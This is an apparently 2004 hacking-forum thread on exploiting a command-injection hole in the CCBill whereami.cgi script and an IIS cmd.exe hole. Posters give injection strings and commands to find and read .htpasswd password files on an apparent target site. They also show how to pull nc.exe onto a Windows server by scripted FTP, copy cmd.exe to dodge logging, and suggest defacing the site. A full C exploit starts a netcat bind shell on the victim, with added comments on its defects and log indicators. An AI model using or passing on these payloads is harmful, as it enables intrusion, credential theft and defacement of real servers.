rUn-gUn
Hey guys, I'm fairly new to exploiting and such. What can I do when I get access to this page:

/cgi-bin/whereami.cgi?g=ls

On a website... It says something like "DUMP OF Environment Variables" and shows all this info about the site/server.

I heard you can execute shell commands somehow, Anyone know about this?
atomix
vuln is old as shit... im sure you can do it like this:

cgi-bin/whereami.cgi?g=|ls|

or
cgi-bin/whereami.cgi?g=|`ls`|
rUn-gUn
yea but what does it do
rapt0r
I believe this is used to run commands, sort of like SQL injection techniques. Is that what you are trying to do?
rUn-gUn
Well im just trying to gain access to the site thru this exploit... but im not sure how I run commands with it , and which commands to run..
Blackknight
Your trying to hack the page.. yay for you

But for learning purposes the whole point is to get past the filters and execute a command the command most likely being a unix command ls is like dir for windows etc
From there you can send a reverse shell to your box and try a local root attempt.
But if you just want to deface the site.. then u can do that with the reverse shell..
i won't go into details you can do some research blink.gif
setthesun
Put a pipe and execute commands in bash. Of course you have to know unix.
fizzik
atomix is right, the exploit is old as shit. Having said that, you will VERY occasionally find them. whereami.cgi?g=commands . It is a CCBill script, by the way.
EXPLOiTED
Well... You dont necessarily need to know UNiX... im not talking about this specific question of /cgi-bin/whereami.cgi?g=ls i found a hole in another site, where i need to gain shell back to fix something... and i scanned... found "CGi holes"... such as:


/scripts/cmd.exe?/c+dir%20c:\

Now when i exec that, i see the dir of C:\... But i cant seem to do anything else, (ie FTP, mkdir, net start) and i was wondering if there were any possible way to gain a shell from this... Any insights?
brainbuster
you could do ..

/scripts/cmd.exe?/c+echo open 123.123.123.123>ftp.bat

/scripts/cmd.exe?/c+echo username >ftp.bat

/scripts/cmd.exe?/c+echo password>ftp.bat

/scripts/cmd.exe?/c+echo get nc.exe>ftp.bat

then you run :

/scripts/cmd.exe?/c+ftp -s:ftp.bat

and voila nc.exe is downloaded :-)
EXPLOiTED
It seems as tho i can only use "DiR"... I will search around and find a text that i can possibly open, maybe get a login / pw for telnet, and fix my problem :\. Thanks for the help


EXPLOiTED
DJVandal
QUOTE (rUn-gUn @ May 19 2004, 02:15 AM)
Well im just trying to gain access to the site thru this exploit... but im not sure how I run commands with it , and which commands to run..

ok so i am assumeing this is a porn site smile.gif my specialty

This script is old but has been renamed a lot of times, also to glocation.cgi and a couple of other names. Anyhow, you want access to the site, right? So you need a password.

try g=locate */.htpasswd
g=locate *.passwd

and such also try replaceing locate with find

once you have found the htpasswd file use
g=cat /usr/www/pornosite.com/cgi-bin/.htpasswd

of course useing the real path to the passfile instead you will now most likely have a list of usernames and DES encrypted pass's there are many programs out there to decrypt DES and it is not a hard encryption to crack
lee
If you can only DIR, but not exec try to copy the cmd.exe to another one and use this one... by the way all your activity with cmd.exe will be logged...

/scripts/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+low.exe
/scripts/low.exe?/c+........................

the commands you run with low.exe are not logged... and should have exec access...
saendler
it is an old sploit, but test it....

/*
* =====================================
* CCBILL CGI Remote Exploit for /ccbill/whereami.cgi
* By: Knight420
* 7/07/03
*
* spawns a shell with netcat and attempts to connect
* into the server on port 6666 to gain access of the
* webserver uid
*
* © COPYRIGHT Blue Ballz , 2003
* all rights reserved
* =====================================
*
*/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>


/*
 * Forward declarations for the two helpers defined below main().
 * net_resolve() turns a host string into an IPv4 address (0 on failure);
 * net_connect() opens a TCP connection with a timeout (see its header).
 */
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);

/*
 * Three HTTP/1.0 request lines, one per known install path of
 * whereami.cgi.  The `g=` parameter carries the URL-encoded command the
 * vulnerable script runs; here it starts a netcat listener on port 6666
 * that main() later attaches to with system().  All three lines are sent
 * back-to-back in a single write(); none is terminated by the blank line
 * that ends an HTTP request, so the server sees them as one request with
 * two odd header lines (not verified here).
 *
 * Declared as unsigned char[] but passed to strlen(), which takes
 * const char * -- a pointer-sign mismatch the compiler will warn about.
 *
 * Detection note: a request for whereami.cgi (or a renamed copy such as
 * the glocation.cgi mentioned in this thread) whose `g=` value is a shell
 * command is the observable indicator of this attempt in web-server
 * access logs.
 */
unsigned char ccbill[] =
"GET /ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/ccbill/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a"
"GET /cgi-bin/whereami.cgi?g=nc%20-l%20-p%206666%20-e%20/bin/bash HTTP/1.0\x0d\x0a";

/*
 * Entry point.  argv[1] is the target host, argv[2] the HTTP port.
 * Sends the request lines in ccbill[] over one TCP connection, then
 * shells out to "nc ${TARGET} 6666" to attach to whatever the server
 * side started.  Exits EXIT_FAILURE on bad usage or a failed connect,
 * EXIT_SUCCESS otherwise; the result of the final system() is not
 * examined.
 *
 * NOTE(review): three defects are left as-is and only documented here:
 *  - the usage printf names a %s but passes no argument (undefined
 *    behavior);
 *  - the "[1]" and "[2]" printfs pass `server` with no conversion to
 *    consume it (harmless but a format/argument mismatch);
 *  - the write() return value is not checked, so a short write goes
 *    unnoticed.
 */
int
main (int argc, char **argv)
{
/* Connected descriptor; the name shadows socket(2), which main() never calls. */
int socket;
/* Name of the environment variable the system() command below expands. */
char *TARGET = "TARGET";
char *server;
unsigned short int port;
struct sockaddr_in sa;

if (argc != 3) {
system("clear");
printf ("[CCBILL CGI Remote Exploit By:Knight420]\n"
"usage: %s <host> <port>\n");
exit (EXIT_FAILURE);
}
/* Export the host as $TARGET so the shell command in system() can use it. */
setenv (TARGET, argv[1], 1);
server = argv[1];
/* No validation: atoi() yields 0 for non-numeric input and does not report overflow. */
port = atoi (argv[2]);

/* 35-second connect timeout; net_connect returns -1 on failure. */
socket = net_connect (&sa, server, port, 35);
if (socket <= 0) {
perror ("net_connect");
exit (EXIT_FAILURE);
}

write (socket, ccbill, strlen (ccbill));
/* Give the server a moment to act on the request before tearing down. */
sleep (1);
close (socket);

printf ("[CCBILL CGI Remote Exploit By:Knight420]\n");
printf ("[1] evil data sent.\n", server);
printf ("[2] connecting to shell.\n", server);
system("nc ${TARGET} 6666 || echo '[-]Exploit failed!'");
exit (EXIT_SUCCESS);
}

/*
 * Resolve `host` -- a dotted-quad string or a hostname -- to an IPv4
 * address in network byte order, returned as an unsigned long.
 * Returns 0 when gethostbyname() fails.
 *
 * NOTE(review): `i` is a long while inet_addr() returns in_addr_t.  On
 * LP64 targets the failure value INADDR_NONE (0xffffffff) is not equal
 * to -1 as a long, so a non-numeric host never reaches gethostbyname()
 * and INADDR_NONE is returned as if it were an address.  The cast on
 * he->h_addr also reads sizeof(unsigned long) bytes from a 4-byte
 * (h_length) address, which is out of bounds on LP64 and violates
 * strict aliasing.  Left as-is; documented only.
 */
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;

/* Try the numeric form first; inet_addr() fails on non-numeric input. */
i = inet_addr (host);
if (i == -1) {
he = gethostbyname (host);
if (he == NULL) {
return (0);
} else {
/* First address of the result, copied through an unsigned long (see note above). */
return (*(unsigned long *) he->h_addr);
}
}

return (i);
}


/*
 * Open a TCP connection to server:port, waiting at most `sec` seconds for
 * connect() to complete, and fill *cs with the address used.
 *
 * Returns the connected descriptor, restored to blocking mode, or -1 with
 * errno set by the failing call (ETIMEDOUT when select() expires or when
 * getsockopt() itself fails).  Several failure paths after connect() do
 * not close the descriptor; that behavior is preserved from the original.
 */
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
    cs->sin_family = AF_INET;
    cs->sin_port = htons (port);

    int sock = socket (cs->sin_family, SOCK_STREAM, 0);
    if (sock == -1) {
        return -1;
    }

    cs->sin_addr.s_addr = net_resolve (server);
    if (cs->sin_addr.s_addr == 0) {
        close (sock);
        return -1;
    }

    /* Non-blocking mode lets connect() return at once so select() can
     * enforce the timeout; the original flags are restored at the end. */
    int saved_flags = fcntl (sock, F_GETFL, 0);
    if (saved_flags == -1
        || fcntl (sock, F_SETFL, saved_flags | O_NONBLOCK) == -1) {
        close (sock);
        return -1;
    }

    int rc = connect (sock, (struct sockaddr *) cs, sizeof *cs);
    if (rc < 0 && errno != EINPROGRESS) {
        close (sock);
        return -1;
    }

    if (rc != 0) {
        /* Connection in progress: wait until the socket becomes readable
         * or writable, or the timeout elapses. */
        fd_set rset, wset;
        FD_ZERO (&rset);
        FD_ZERO (&wset);
        FD_SET (sock, &rset);
        FD_SET (sock, &wset);
        struct timeval tv = { .tv_sec = sec, .tv_usec = 0 };

        int ready = select (sock + 1, &rset, &wset, NULL, &tv);
        if (ready == 0) {
            close (sock);
            errno = ETIMEDOUT;
            return -1;
        }
        if (ready == -1) {
            return -1;
        }

        int readable = FD_ISSET (sock, &rset);
        int writable = FD_ISSET (sock, &wset);
        if (!readable && !writable) {
            return -1;
        }
        if (readable && writable) {
            /* Both sets fire on success and on a pending error alike;
             * SO_ERROR tells the two apart. */
            int soerr = 0;
            socklen_t errlen = sizeof soerr;
            if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &soerr, &errlen) < 0) {
                errno = ETIMEDOUT;
                return -1;
            }
            if (soerr != 0) {
                errno = soerr;
                return -1;
            }
        }
        /* Exactly one of readable/writable set: treated as connected. */
    }

    /* Back to the caller's original (blocking) flags. */
    if (fcntl (sock, F_SETFL, saved_flags) == -1) {
        return -1;
    }
    return sock;
}
D3ADLiN3
That exploit isn't a lot of good if the server hasn't got netcat on it.

Also, I doubt you can deface the website, since the web script would run as the apache user and would have next to no rights.
FazerFreak
can someone deliver the compiled version of CCBILL CGI Remote Exploit ? rolleyes.gif
[R]
kieddie rolleyes.gif

gcc -o <name> <name>
./<name>


This will help you.
Icarus
Under windows use Cygwin

gcc -o file.exe file.c

Greetz